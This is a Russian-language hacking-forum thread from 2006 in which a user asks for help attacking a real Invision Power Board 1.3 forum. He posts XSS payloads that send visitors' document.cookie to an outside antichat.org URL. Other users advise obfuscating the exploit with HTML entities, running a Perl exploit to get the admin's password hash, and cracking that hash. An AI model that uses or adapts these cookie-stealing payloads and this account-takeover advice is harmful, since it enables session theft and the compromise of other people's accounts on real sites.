Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Invision 1.3 Xss ? (https://forum.antichat.xyz/showthread.php?t=19549)

slider 23.05.2006 17:26
Invision 1.3 Xss ?
 
Нужна поиощь есть форум

http://forum.низя ссылки.ru

Powered by Invision Power Board(U) v1.3 Final © 2003 IPS, Inc.

На нем я использовал


[E*MAIL][U*RL=wj`=`][/U*RL][/E*MAIL]]` style=`background:url(javascript:document.images[1].src="http://antichat.org/s/slider.gif?"+document.cookie)`

Дыру закрыли

То ест теперь видя этот XSS Непроисходит никаких действий то есть подпись такой же становится как содержимое XSS

Помогите зашифровать его или другой способ!!

Пробовал через картинку! (Вродь картинку поставил но Hash пароля не пришол) За ранее thank's

*Van* 25.05.2006 18:31
Попробуй зашифровать некоторые фрагменты сплойта тут:
_http://www.h4cky0u.org/encrypt/index.php
в кодировку HTML Entities

em00s7 25.05.2006 20:08
ТЫ не пробывал Этот эксплоит

slider 26.05.2006 18:44
Как использовать сплойт на forum.test.ru ID юзера 123
perl 1.pl test.ru /forum/ 123 0

Так?

slider 26.05.2006 18:53
Нашол другой XSS

Можно ли его вставиить в картинку ??

wj@wj.com ` style=`background:url(javascript:document.images[1].src="http://antichat.org/s/slider.gif?"+document.cookie);

SanyaX 26.05.2006 19:54
да зачем тебе с XSS париться. Вот паренёк дал сплойт. Запускай вводи типо C:\bin\perl.exe C:\file.pl http://lol.ru forum/ 1 0. И всё хэш админа твой. Теперь в руки passwords pro и ты поимел админа аккаунт.

slider 01.06.2006 13:01
Ладно ЗАКРЫЛИ!

Непрошол exploit


Время: 10:57